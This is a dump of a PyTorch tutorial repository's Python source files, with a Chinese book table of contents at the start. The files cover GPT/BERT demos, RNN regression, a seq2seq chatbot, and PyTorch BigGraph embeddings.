\n return name\n \n def delete(self, ids):\n self.curs.execute(config.DELETE_DATA_QUERY, (ids,))\n self.conn.commit()\n\n datapaths = glob.glob(config.DATA_ROOT+\"/people.\"+str(ids)+\"*\")\n for path in datapaths:\n os.remove(path)\n \n def close(self):\n self.conn.close()\n\n" }, { "alpha_fraction": 0.6224899888038635, "alphanum_fraction": 0.6278446912765503, "avg_line_length": 34.595237731933594, "blob_id": "1e5c8d6ab6c5fad9accc96aeeb1ccc57c9c57d0a", "content_id": "f66f8b626054e38d14180599b3a35dd94b554250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1494, "license_type": "no_license", "max_line_length": 88, "num_lines": 42, "path": "/src/model.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\nimport os\nimport numpy as np\n\nimport config\nimport utils\n\n\nclass Model:\n def __init__(self):\n self.recognizer = cv2.face.LBPHFaceRecognizer_create()\n\n def train(self):\n images = os.listdir(\n config.DATA_ROOT\n ) # list semua path data wajah pada folder train data\n\n print(\"[INFO] Preparing Training Data...\")\n image_arrays = [] # Containes semua array data wajah\n image_ids = [] # Container semua ID data wajah\n for i, image_path in enumerate(images): # Looping semua path data wajah\n splitted_path = image_path.split(\".\")\n # print(splitted_path)\n image_id = int(splitted_path[1]) # Ambil ID data wajah\n\n image = cv2.imread(os.path.join(config.DATA_ROOT, image_path))\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n image_array = np.array(image, \"uint8\") # Ambil array data wajah\n\n image_arrays.append(image_array) # Store array data wajah ke list/container\n image_ids.append(image_id) # Store ID data wajah ke list/container\n utils.pretty_print(len(images), i)\n\n print(\"[INFO] Training Start!\")\n self.recognizer.train(image_arrays, np.array(image_ids)) # Train recognizer\n self.recognizer.save(config.MODEL_PTH) # Save model recognizer\n print(\"[INFO] TRAIN RECOGNIZER SUCCESS!\")\n\n def load(self):\n self.recognizer.read(config.MODEL_PTH)\n return 
self.recognizer" }, { "alpha_fraction": 0.5336848497390747, "alphanum_fraction": 0.5430579781532288, "avg_line_length": 37.79545593261719, "blob_id": "e87981283b5d961768db7a0157a23ee0c96825ba", "content_id": "9716ead28fc15a1899da498204929b1715dd5aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 143, "num_lines": 44, "path": "/src/recog_face.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\nimport model\nimport database\nimport config\nimport utils\n\n\n\"\"\"\nFile untuk melakukan proses Face Recognition. Wajah diukur jaraknya\ndengan yang sudah ada pada database. Nama yang berasosiasi dengan\njarak wajah terdekat akan dikembalikan hasilnya\n\"\"\"\n\nmodel = model.Model()\nrecognizer = model.load()\n\ndb = database.Database()\n\nface_cascade = cv2.CascadeClassifier(config.FACE_CASCADE_PTH)\n\ncam = cv2.VideoCapture(1) # Akses Kamera\nwhile True:\n ret, frame = cam.read() # Membaca setiap frame dari stream kamera \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Mengubah mode BGR ke GRAY (hitam putih)\n \n # Proses pencarian wajah \n faces = face_cascade.detectMultiScale(gray, 1.3, 3) # <cascade_file>.detectMultiScale(<frame>, <scale_factor>, <min_neighbors>)\n for x, y, w, h in faces: # Looping semua wajah yang terdeteksi\n roi_gray = gray[y:y+h, x:x+w]\n ids, dist = recognizer.predict(roi_gray)\n name = db.get_name(ids)[0] # Prediksi wajah siapoa\n frame = utils.draw(frame.copy(), x, y, w, h, ids, name, dist)\n\n \n cv2.imshow('Face Recognition Video', frame) # Jendela untuk menampilkan hasil\n \n if cv2.waitKey(1) & 0xff == ord('x'): # Exit dengan tombol x\n break\n\ncam.release() # Menyudahi akses kamera\ncv2.destroyAllWindows() # Menutup jendela\n\ndb.close()\n" }, { "alpha_fraction": 0.6287397742271423, "alphanum_fraction": 0.6563916802406311, "avg_line_length": 27.649351119995117, "blob_id": "69bcbed589e0ad23a2a6aaf0b7aa43f7fc356af2", "content_id": "813f0d314957b7f4b8dcd0fbe2418619471a9ae1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2206, "license_type": "no_license", "max_line_length": 98, "num_lines": 77, "path": "/app.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\nfrom numpy import expand_dims, zeros\nfrom scipy.spatial.distance import cosine\n\nimport tensorflow as tf\n# enabling GPU - uncomment below to run on non-colab with GPU machine\nphysical_devices = tf.config.experimental.list_physical_devices(\"GPU\")\ntf.config.experimental.set_memory_growth(physical_devices[0], enable=True)\n\nfrom keras_vggface.vggface import VGGFace\nfrom keras_vggface.utils import preprocess_input\n\n\ndef extract_face(image):\n face_cascade = cv2.CascadeClassifier(\"src/CascadeFile/face-detect.xml\")\n\n image = image.copy()\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n \n face_image = zeros((224, 224, 3), dtype='float64')\n try:\n face_coords = face_cascade.detectMultiScale(gray, 1.3, 3)[0]\n\n x, y, w, h = face_coords\n face_image = image[y:y+h, x:x+w]\n\n face_image = cv2.resize(face_image, (224, 224), interpolation=cv2.INTER_LINEAR)\n face_image = face_image.astype('float64')\n except:\n pass\n \n return face_image\n\n\ndef get_embedding(model, face_image):\n face_image = preprocess_input(face_image, version=2)\n face_image = expand_dims(face_image, axis=0)\n 
embedding = model.predict(face_image)\n    return embedding\n\n\ndef is_match(first_embedding, second_embedding, thresh=0.4):\n    matchness = cosine(first_embedding, second_embedding)\n    if matchness <= thresh:\n        print(\"Match\")\n    else:\n        print(\"Not Match\")\n    \n    print(f\"Matchness Cosine Score: {matchness}\")\n\ndef main():\n    model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg')\n\n    first_image = get_embedding(model, extract_face(cv2.imread(\"src/data/ronaldo.jpg\")))\n    \n    cam = cv2.VideoCapture(0)\n\n    while 1:\n        _, frame = cam.read()\n        frame = cv2.resize(frame, (640, 480))\n\n        second_image = get_embedding(model, extract_face(frame))\n        is_match(first_image, second_image)\n        \n        cv2.imshow(\"Preview\", frame)\n\n        if cv2.waitKey(1) & 0xff == ord('q'):\n            break\n\n    cam.release()\n    cv2.destroyAllWindows()\n\n    is_match(first_image, second_image)\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.5021321773529053, "alphanum_fraction": 0.5138592720031738, "avg_line_length": 18.93617057800293, "blob_id": "ebc94848c16c9ccbb6e8c03512d66ee3bc840bb5", "content_id": "92664e1faa27aa5d74afa16988aca9aeb48f742d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 938, "license_type": "no_license", "max_line_length": 50, "num_lines": 47, "path": "/src/explore_db.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import database\n\n\"\"\"\nFile untuk manajemen database\n\"\"\"\n\ndb = database.Database()\n\ndef show():\n    datas = db.show()\n    print(\"\\nID | NAME\")\n    print('-'*10)\n    for ids, name in datas:\n        print(str(ids)+\" | \"+name)\n\nMENU = \"\"\"SELECT MENU\n[1] Look All Data\n[2] Update Existing Data\n[3] Delete Data\n[4] Quit\n      \"\"\"\n\nwhile 1:\n    print(MENU)\n    num_menu = int(input(\"Select: \"))\n\n    if num_menu == 1:\n        show()\n    elif num_menu == 2:\n        ids = int(input(\"\\nInsert ID: \"))\n        new_name = input(\"Insert New Name: \")\n        db.update_name(ids, new_name)\n        print(\"\\nDB Updated!\")\n        show()\n    elif num_menu == 3:\n        ids = int(input(\"\\nInsert ID: \"))\n        db.delete(ids)\n        print(\"\\nDB Updated!\")\n        show()\n    elif num_menu == 4:\n        db.close()\n        break\n\n    continues = input(\"\\nAnother Command (y/n): \")\n    if continues.lower() == 'n':\n        db.close()\n        break\n\n" }, { "alpha_fraction": 0.7832860946655273, "alphanum_fraction": 0.7870632410049438, "avg_line_length": 59.5428581237793, "blob_id": "22d1e4b1e87ebc5f53940266c077fcdfcd096db3", "content_id": "6d3dbc340276a7bdae2d4750666023315d780b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2118, "license_type": "no_license", "max_line_length": 101, "num_lines": 35, "path": "/src/README.txt", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "Quickstart:\n- Untuk melakukan input wajah baru gunakan command \"python input_face.py\" di dalam folder ini\n    - Tekan tombol 'c' untuk melakukan capture data wajah sebanyak 10x\n    - Tekan tombol 't' untuk memulai proses training agar data wajah dikenali\n    - Terakhir, tekan tombol 'x' saat proses sudah selesai untuk keluar program\n\n- Untuk mencoba hasil training model, gunakan command \"python recog_face.py\"\n    - Maka jendela baru akan tampil dan menampilkan Face Recognition terhadap wajah yang\n      terdeteksi di kamera\n    - Proses Recognition menggunakan metode LBPH yang mengukur seberapa dekat jarak wajah saat ini\n      dengan wajah yang sudah disimpan di database, semakin dekat jaraknya (angka yang 
muncul kecil) \n      maka semakin bagus.\n    - Konfigurasi saat ini jika jarak yang dihitung lebih kecil dari 70 maka ditampilkan. Sementara\n      yang lebih akan dibuang dan ditampilkan sebagai Unknown.\n    \nPenjelasan Detail:\n- Metode deteksi wajah menggunakan algoritma Viola-Jones\n- Metode rekognisi wajah menggunakan metode LBPH (Local Binary Pattern Histogram)\n- Database yang digunakan untuk menampung ID dan Nama adalah SQLite3\n- Library yang dipakai antara lain: OpenCV, NumPy, dan Sqlite3\n\n- Script input_face.py\n  Dalam script ini dilakukan proses deteksi wajah, ketika user menekan tombol 'c' untuk \n  capture wajah maka wajah saat ini (yang terdeteksi) akan disimpan dalam folder \"data\".\n  Setelah 10 wajah berhasil disimpan maka dilakukan proses \"fitting\" atau training agar\n  model dapat mengenali fitur wajah tersebut berasosiasi dengan ID yang mana.\n  Setelah proses training selesai maka akan dihasilkan file \"recognizer.yml\" pada \n  folder \"model\". \n  Penjelasan script lebih lanjut sebagian besar sama dengan video yang ada di YouTube saya \n\n- Script recog_face.py\n  Dalam script ini dilakukan proses rekognisi wajah dengan mengukur jarak histogram data wajah\n  saat ini dengan yang sudah ada di model. Seluruh proses kurang lebih sama dengan video yang\n  ada di YouTube saya, bedanya saat ini adalah proses penampilan nama berdasarkan nama yang telah \n  disimpan di dalam database." }, { "alpha_fraction": 0.5211864113807678, "alphanum_fraction": 0.5635592937469482, "avg_line_length": 23.413793563842773, "blob_id": "38e8eba9eeda587dfd45b9ba471824b2b7a1f0d7", "content_id": "6ecdfce826ae5c25784f8c25d8ae6a02e9b0c775", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 708, "license_type": "no_license", "max_line_length": 75, "num_lines": 29, "path": "/scratch.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\ndef extract_face(image):\n    face_cascade = cv2.CascadeClassifier(\"src/CascadeFile/face-detect.xml\")\n\n    image = image.copy()\n    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    \n    face_coords = face_cascade.detectMultiScale(gray, 1.3, 3)\n    \n    return face_coords\n\nif __name__ == \"__main__\":\n    cam = cv2.VideoCapture(0)\n\n    while 1:\n        _, frame = cam.read()\n        frame = cv2.resize(frame, (640, 480))\n\n        for x, y, w, h in extract_face(frame):\n            cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n        \n        cv2.imshow(\"Preview\", frame)\n\n        if cv2.waitKey(1) & 0xff == ord('q'):\n            break\n\n    cam.release()\n    cv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.446988970041275, "alphanum_fraction": 0.49194231629371643, "avg_line_length": 24.085105895996094, "blob_id": "dcb80bbc0488ff97db47e17239486ac7853e01bb", "content_id": "44f9bb963379562c2b9d3953d95f6c4470c5a72c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 90, "num_lines": 47, "path": "/src/utils.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import cv2\n\nimport config\n\n\ndef pretty_print(raw_total, raw_current, custom_processing=\"Processing ...\"):\n    # base 20 ####################\n    total = raw_total - 1\n    current = raw_current + 1\n    size = int(20 * (raw_current / total))\n    remain = 20 - size\n    if remain > 0:\n        return print(\n            f\"\\r {current}/{raw_total} [\",\n            \"#\" * size,\n            \" \" * remain,\n            f\"] {custom_processing}\",\n            end=\"\",\n        )\n    else:\n        return print(f\"\\n\\r 
{current}/{raw_total} [\", \"#\" * size, \"] Done!\\n\", end=\"\")\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef draw(frame, x, y, w, h, ids, name, dist):\n color = (200, 255, 0)\n\n if dist > config.THRESHOLD:\n name = \"Unknown\"\n dist = 0\n\n color = (200, 0, 255)\n\n cv2.rectangle(\n frame, (x, y), (x + w, y + h), color, 3\n ) # Gambar box untuk setiap wajah\n \n text = f\"{name} {round(dist, 2)}\"\n text_size = cv2.getTextSize(text, font, 0.5, 2)[0]\n cv2.rectangle(frame, (x - 3, y), (x + text_size[0], y - text_size[1] - 15), color, -1)\n\n cv2.putText(\n frame, text, (x, y - 10), font, 0.5, (50, 50, 50), 2,\n )\n return frame\n" }, { "alpha_fraction": 0.5583623647689819, "alphanum_fraction": 0.5618466734886169, "avg_line_length": 23.4255313873291, "blob_id": "ff112ce4fe1296ba2dff7068997f823351340307", "content_id": "daf47c71fd2a9acb5898e89397b7753e4a311bd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1148, "license_type": "no_license", "max_line_length": 67, "num_lines": 47, "path": "/src/config.py", "repo_name": "IqbalLx/face-verifification", "src_encoding": "UTF-8", "text": "import os\n\n\"\"\"\nIni adalah file untuk mengatur konfigurasi seluruh script\n\"\"\"\n\n\n# Cascade file configuration\nCASCADE_ROOT = 'CascadeFile'\nFACE_CASCADE = 'face-detect.xml'\nFACE_CASCADE_PTH = os.path.join(CASCADE_ROOT, FACE_CASCADE)\n\n# Recognizer configuration\nMODEL_ROOT = 'model'\nMODEL_NAME = 'recognizer.yml'\nMODEL_PTH = os.path.join(MODEL_ROOT, MODEL_NAME)\nTHRESHOLD = 70\n\n# Data configuration\nDATA_ROOT = 'data'\nTOTAL_DATA = 10\n\n# DB Configuration\nDB_ROOT = 'database'\nDB_NAME = 'database.db'\nDB_PATH = os.path.join(DB_ROOT, DB_NAME)\n\nCREATE_TABLE_QUERY = \"\"\"CREATE TABLE IF NOT EXISTS Data (\n id integer NOT NULL,\n name text NOT NULL\n );\"\"\"\n\nSHOW_QUERY = \"\"\"SELECT * FROM Data\"\"\"\n\n\nINSERT_DATA_QUERY = \"\"\"INSERT INTO Data (id, name) VALUES (?, ?)\"\"\"\n\nUPDATE_DATA_QUERY = \"\"\"UPDATE Data\n SET name = ?\n WHERE id = ?\n \"\"\"\n\nSELECT_NAME_QUERY = \"\"\"SELECT name\n FROM Data \n WHERE id = ?\n \"\"\"\nDELETE_DATA_QUERY = \"\"\"DELETE FROM Data WHERE id = ?\"\"\"\n" } ]
9
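A note on the LBPH workflow the README above describes: the train/predict cycle is compact enough to sketch directly. This is a hedged sketch, not the repo's code; it assumes opencv-contrib-python (which provides cv2.face), the file names and the single ID label are illustrative, and the distance cutoff of 50 is the figure quoted in the README (the repo's config.py actually ships THRESHOLD = 70).

    import cv2
    import numpy as np

    recognizer = cv2.face.LBPHFaceRecognizer_create()

    # Train on grayscale face crops; every sample carries an integer ID label.
    faces = [cv2.imread("data/1.%d.jpg" % i, cv2.IMREAD_GRAYSCALE) for i in range(10)]
    labels = np.array([1] * 10)  # all ten crops belong to ID 1
    recognizer.train(faces, labels)
    recognizer.write("model/recognizer.yml")

    # Predict: LBPH returns (label, distance); a smaller distance is a closer match.
    recognizer.read("model/recognizer.yml")
    probe = cv2.imread("probe.jpg", cv2.IMREAD_GRAYSCALE)
    label, dist = recognizer.predict(probe)
    print("Unknown" if dist > 50 else "ID %d" % label, dist)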
joelhaasnoot/spoortkaarthopper-tools
https://github.com/joelhaasnoot/spoortkaarthopper-tools
c0c7e8c2fdd18636276f29fa8c370acdcfc582e0
225a1044594da507e1bdc2bc32126b22b2ea483f
c3c0a442207746dc769da4e529ae85d91ae23d08
refs/heads/master
2021-01-15T23:02:19.500288
2014-01-04T13:55:07
2014-01-04T13:55:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5258393287658691, "alphanum_fraction": 0.5548849701881409, "avg_line_length": 25.510000228881836, "blob_id": "a8f9822eb79e3f88cd677803b5f3b43cf7a330a6", "content_id": "6a1c7ba0cc671ad09aed015b010de7fc8a389907", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2651, "license_type": "permissive", "max_line_length": 105, "num_lines": 100, "path": "/list_to_map.py", "repo_name": "joelhaasnoot/spoortkaarthopper-tools", "src_encoding": "UTF-8", "text": "\"\"\"\nConvert a list of to/from coordinates and a path to a map of each individual path and an overview\nRequires pygmaps\n\"\"\"\nimport csv\n\nimport sys\nimport pygmaps\n\nclass MapMaker:\n output_dir = \"\"\n\n def __init__(self, output):\n self.output_dir = output\n\n def make_map(self, a, b, point_a, point_b, path):\n # Add to a map and write it out\n path_map = pygmaps.maps(point_a[0], point_a[1], 12)\n path_map.addpoint(point_a[0], point_a[1], \"#0000FF\")\n path_map.addpoint(point_b[0], point_b[1], \"#0000FF\")\n\n # Convert the list\n path_map.addpath(path, \"#FF0000\")\n\n path_map.draw('%s/%s-%s.html' % (self.output_dir, a.capitalize(), b.capitalize()));\n\n\ndef decode_line(encoded):\n \"\"\"\n Decodes a polyline that was encoded using the Google Maps method.\n\n See http://code.google.com/apis/maps/documentation/polylinealgorithm.html\n\n This is a straightforward Python port of Mark McClure's JavaScript polyline decoder\n (http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)\n and Peter Chng's PHP polyline decode\n (http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)\n \"\"\"\n\n encoded_len = len(encoded)\n index = 0\n array = []\n lat = 0\n lng = 0\n\n while index < encoded_len:\n\n b = 0\n shift = 0\n result = 0\n\n while True:\n b = ord(encoded[index]) - 63\n index = index + 1\n result |= (b & 0x1f) << shift\n shift += 5\n if b < 0x20:\n break\n\n dlat = ~(result >> 1) if result & 1 else result >> 1\n lat += dlat\n\n shift = 0\n result = 0\n\n while True:\n b = ord(encoded[index]) - 63\n index = index + 1\n result |= (b & 0x1f) << shift\n shift += 5\n if b < 0x20:\n break\n\n dlng = ~(result >> 1) if result & 1 else result >> 1\n lng += dlng\n\n array.append((lat * 1e-5, lng * 1e-5))\n\n return array\n\n\ndef run():\n INPUT_FILE = sys.argv[1]\n OUTPUT_DIR = sys.argv[2]\n\n paths = []\n\n m = MapMaker(OUTPUT_DIR)\n with open(INPUT_FILE, 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for row in reader:\n path = decode_line(row[2])\n path_tup = (row[0], row[1], path)\n paths.append(path_tup)\n m.make_map(row[0], row[1], path[0], path[-1], path)\n #total_map.addpath(list(thelist), \"#FF0000\") # Also add to our global map with all the pieces\n\n\nif __name__ == \"__main__\":\n run()\n" }, { "alpha_fraction": 0.6270871758460999, "alphanum_fraction": 0.6326530575752258, "avg_line_length": 30.52941131591797, "blob_id": "79cc350d370aadd5dfa7fd4e282278a198bf7aa5", "content_id": "8a856e6a186cc5cd38b50b5a81fac7addf92f6cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "permissive", "max_line_length": 89, "num_lines": 17, "path": "/list_to_geojson.py", "repo_name": "joelhaasnoot/spoortkaarthopper-tools", "src_encoding": "UTF-8", "text": "\"\"\"\nThis tool converts output.csv into a GeoJSON blob with each line being a feature\n\"\"\"\nfrom polyline 
import *\nimport json\n\nfeatures = []\nwith open('output.csv', 'r') as input_file:\n\tfor line in input_file.readlines():\n\t\trow = line.split(',')\n\n\t\tobj = { 'type' : 'Feature', 'geometry' : {'type' : 'LineString', 'coordinates' : [] }, \n\t\t\t'properties' : {'from' : row[0], 'to' : row[1] } }\n\t\tobj['geometry']['coordinates'] = decode(row[2])\n\t\tfeatures.append(obj)\n\nprint json.dumps({'type' : 'FeatureCollection', 'features' : features })\n\t\t\n" } ]
2
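The decode_line() function above is a straight port of Google's polyline decoding, so it can be sanity-checked against the worked example in Google's own algorithm documentation. A minimal usage sketch; the encoded string is Google's documented sample, not data from this repo:

    from list_to_map import decode_line

    encoded = "_p~iF~ps|U_ulLnnqC_mqNvxq`@"  # Google's three-point sample polyline
    print(decode_line(encoded))
    # Expected: [(38.5, -120.2), (40.7, -120.95), (43.252, -126.453)]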
Maxim323/GoogleForms-Bot
https://github.com/Maxim323/GoogleForms-Bot
963907db02778c073f49ebfc37923475df2f6634
adf85d4f6d937a9faefa9582d6870bd04b75cdf3
db89dcb96c312e90581008d1347af2646c780878
refs/heads/main
2023-07-22T16:45:49.684917
2021-09-05T11:45:42
2021-09-05T11:45:42
367,999,120
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5989491939544678, "alphanum_fraction": 0.7005254030227661, "avg_line_length": 25.190475463867188, "blob_id": "c01fd7bb7d1cb663f6b8bb6b210c788c1be96b01", "content_id": "413ded8b3c79b88b8029dcdea9fcc14621a04b80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 195, "num_lines": 21, "path": "/exec.py", "repo_name": "Maxim323/GoogleForms-Bot", "src_encoding": "UTF-8", "text": "import re\r\nimport time\r\nstart_time = time.time()\r\n\r\nDemo = 'https://docs.google.com/forms/d/e/1FAIpQLSfVAfLRrBPkhP55_1jrP9IrPys99BjayAzQ_G_EM2bJ0iNd_w/viewform?usp=pp_url&entry.2098263493=2&entry.1497167764=2&entry.1495890103=2&entry.1012177044=2'\r\n\r\n\r\n\r\nstart = Demo[:116]\r\nstart = start.replace('viewform','formResponse')\r\n\r\nresult = re.search('entry(.*)&',Demo)\r\nresult = result.group(1)\r\nresult = result.replace('=2','=%s')\r\nfinal = start + result\r\n\r\n\r\nprint(start)\r\nprint(result)\r\nprint(final)\r\nprint(\"Time while running: %s seconds.\" % (time.time() - start_time))\r\n" } ]
1
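Once exec.py above has built `final`, a formResponse URL with %s placeholders, submitting the form is just string substitution plus an HTTP request. A hedged sketch using the requests library; FORM_ID stands in for the real form ID, the two entry numbers are taken from the Demo URL above, and the answer strings are placeholders, not the author's code:

    import requests

    final = ("https://docs.google.com/forms/d/e/FORM_ID/formResponse"
             "?usp=pp_url&entry.2098263493=%s&entry.1497167764=%s")
    resp = requests.post(final % ("answer1", "answer2"))
    print(resp.status_code)  # 200 means Google accepted the submission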
kristenkoyanagi/ConfigureESC
https://github.com/kristenkoyanagi/ConfigureESC
b6f1e8866d6128cf2f1ed5a00d43ef0697789be4
6f05dbf05f320db73d687e0e77aa6e1dba603af2
435b02753a847c5c3b96b2892a43eacb63323c3d
refs/heads/master
2017-12-31T05:49:16.129996
2016-12-08T02:10:34
2016-12-08T02:10:34
72,059,907
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5097744464874268, "alphanum_fraction": 0.544360876083374, "avg_line_length": 19.15151596069336, "blob_id": "abda2b8ac3f6b6db278efdcb3100c2aad2824bd6", "content_id": "170db50873781130f55a08c2f850813d8358470e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 52, "num_lines": 33, "path": "/Motor.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import pigpio\nimport time\n\nclass Motor(object):\n global frequency, speed\n NeutralBand = [0,0] #in Duty Cycle\n IdleReverse = [0,0]\n IdleForward = [0,0]\n pin = 0\n pi = pigpio.pi()\n frequency = 50\n\n\n def __init__(self, NB, IR, IF, pin, pi):\n \n \n self.NeutralBand = NB\n self.IdleReverse = IR\n self.IdleForward = IF\n self.pin = pin\n self.pi = pi\n\n self.frequency = 50\n self.speed = 1.5*frequency\n\n pi.hardware_PWM(pin, frequency, speed*10000)\n \n \n \n \n def ChangeSpeed(speed):\n self.speed = speed\n pi.hardware_PWM(pin, frequency, speed*10000)\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 14.5, "blob_id": "864fe4108ceddeba796f9b44de43801c93c89a07", "content_id": "8e5dea5fc71e0b06e4d72bffc8f36434574be78a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "# Motor Test\n# Motor-ESC-Tests\n" }, { "alpha_fraction": 0.44863012433052063, "alphanum_fraction": 0.5082191824913025, "avg_line_length": 23.25, "blob_id": "e48298af6b4122000f59b37b2d5f661c80aa4b12", "content_id": "3c26de61e80d5b3bbf37cceca72cacb9a36b56ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 63, "num_lines": 60, "path": "/MotorTest2.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import time\nimport RPi.GPIO as GPIO\nimport pigpio\nimport RPIO\n\n\ndef MotorTest(pin1, pin2):\n\n #pin must be 12, 13, 18, or 19\n\n running = True\n\n Frequency = 50\n \n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n speed1 = Neutral\n speed2 = Neutral\n\n pi = pigpio.pi()\n pi.hardware_PWM(pin1, Frequency, speed1*10000)\n pi.hardware_PWM(pin2, Frequency, speed2*10000)\n\n \n while(running):\n ctrl = raw_input(\"w: speed up. s: slow down. 
q:quit\")\n if(ctrl==\"w\"):\n speed1 = speed1+0.5\n speed2 = speed2+0.5\n elif(ctrl==\"s\"):\n speed1 = speed1-0.5\n speed2 = speed2-0.5\n elif(ctrl==\"q\"):\n speed1 = 0\n speed2 = 0\n running = False\n elif(ctrl==\"max\"):\n speed1 = MaxSpeed\n speed2 = MaxSpeed\n elif(ctrl==\"min\"):\n speed1 = MinSpeed\n speed2 = MinSpeed\n elif(ctrl==\"n\"):\n speed1 = Neutral\n speed2 = Neutral\n elif(ctrl==\"a\"):\n speed1 = speed1 + 0.25\n elif(ctrl==\"d\"):\n speed2 = speed2 + 0.25\n\n# if(speed>MaxSpeed):\n# speed = MaxSpeed\n## elif(speed<MinSpeed):\n## speed = MinSpeed\n \n print(speed1, speed2)\n pi.hardware_PWM(pin1, Frequency, speed1*10000) \n pi.hardware_PWM(pin2, Frequency, speed2*10000) \n \n\n\n" }, { "alpha_fraction": 0.5197934508323669, "alphanum_fraction": 0.5765920877456665, "avg_line_length": 21.038461685180664, "blob_id": "f5f0447db1e3b1f80e7e17f73dd1643fc792a227", "content_id": "274d78218828d8e714d50a9fa8a4ae811dcc4c63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 68, "num_lines": 26, "path": "/CharacterizeMotor.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import pigpio\nimport time\n\ndef CharacterizeMotor(pin):\n\n Frequency = 50\n \n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n speed = 7.7\n\n pi = pigpio.pi()\n pi.hardware_PWM(pin, Frequency, speed*10000)\n\n ctrl = raw_input(\"Press enter to continue\")\n\n for i in range(0,100,1):\n speed = speed + 0.01\n pi.hardware_PWM(pin, Frequency, speed*10000)\n t = speed*0.2\n print(\"Duty Cycle: \" + str(speed) + \"% Time: \" + str(t))\n time.sleep(5)\n\n pi.hardware_PWM(pin, Frequency, 0)\n\n\n \n\n" }, { "alpha_fraction": 0.5620728731155396, "alphanum_fraction": 0.5820045471191406, "avg_line_length": 25.876922607421875, "blob_id": "ec394360441c2cd132e049393de71e3e22b9f01b", "content_id": "41bb0f268fe45bef34eb9cb4fedf8f29396d43f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1756, "license_type": "no_license", "max_line_length": 82, "num_lines": 65, "path": "/MotorControl.py", "repo_name": "kristenkoyanagi/ConfigureESC", "src_encoding": "UTF-8", "text": "import time\nimport RPi.GPIO as GPIO\n\ndef MotorControl(pin1, pin2):\n \n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(pin1, GPIO.OUT)\n GPIO.setup(pin2, GPIO.OUT)\n \n running = True\n\n Frequency = 20\n MaxSpeed = 0.2*Frequency\n MinSpeed = 0.1*Frequency\n Neutral = 0.15*Frequency\n \n LeftSpeed = Neutral\n RightSpeed = Neutral\n\n RightMotor = GPIO.PWM(pin1, Frequency) \n RightMotor.start(0)\n LeftMotor = GPIO.PWM(pin2, Frequency)\n LeftMotor.start(0)\n\n RightMotor.ChangeDutyCycle(LeftSpeed)\n LeftMotor.ChangeDutyCycle(RightSpeed)\n\n ctrl = input(\"After ESC startup, press any key to continue.\")\n\n LeftSpeed = Neutral\n RightSpeed = Neutral\n RightMotor.ChangeDutyCycle(RightSpeed)\n LeftMotor.ChangeDutyCycle(LeftSpeed)\n \n while(running):\n ctrl = input(\"Use ASDW to navigate.\")\n if(ctrl == \"a\"):\n 